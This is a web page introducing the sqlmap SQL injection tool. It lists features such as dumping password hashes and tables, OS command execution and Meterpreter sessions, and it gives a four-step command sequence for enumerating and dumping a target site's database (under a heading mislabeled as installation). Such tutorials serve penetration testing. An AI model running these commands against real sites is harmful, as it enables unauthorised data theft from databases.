SQL Map (sqlmap)

Multi Purpose Hacking/ Pentesting Tools

What is Sqlmap?
sqlmap is an open source tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It includes a powerful detection engine, a lot of niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Is Sqlmap free?
Yes, sqlmap is free to use and works out of the box with Python version 2.6.x and 2.7.x on any platform/p>

  1. Fully support MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  2. Fully support for 6 SQL injection techniques which are boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  3. Contains support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Contains support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Contains an automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  6. Contains support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  7. Contains support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Contains support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Contains support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Contains support to create an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Contains support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

Some options for python sqlmap.py

Helpful Stuff
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program’s version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)

Target: At least one of these options has to be provided to define the target(s)
-d DIRECT Connection string for direct database connection
-u URL, --url=URL Target URL (e.g. “http://www.site.com/vuln.php?id=1”)
-l LOGFILE Parse target(s) from Burp or WebScarab proxy log file
-x SITEMAPURL Parse target(s) from remote sitemap(.xml) file
-m BULKFILE Scan multiple targets given in a textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target URLs
-c CONFIGFILE Load options from a configuration INI file

What are the Typical Uses for sqlmap
Sqlmap is written in python and is considered as one of the most powerful and popular sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. This hacking tool can even read and write files on the remote file system under certain conditions. sqlmap is like metasploit of sql injections.

How To Install Sqlmap
This tool works best on Linux, preferably something like Kali Linux, Backbox or any other flavours therein for Pentesting Purposes.

Step 1: sqlmap -u "http://www.yourwebsiteurl.com/section...(without quotation marks)" --dbs

Step 2: sqlmap -u "http://www.yourwebsiteurl.comsection....(without quotation marks)" -D database_name --tables

Step 3: sqlmap -u "http://www.yourwebsiteurl.com/section...(without quotation marks)" -D database_name -T tables_name --columns

Step 4: sqlmap -u "http://www.site.com/section.php?id=51(without quotation marks)" -D database_name -T tables_name -C column_name --dump

Enjoy and use responsibly!

Leave a comment or reply below...thanks!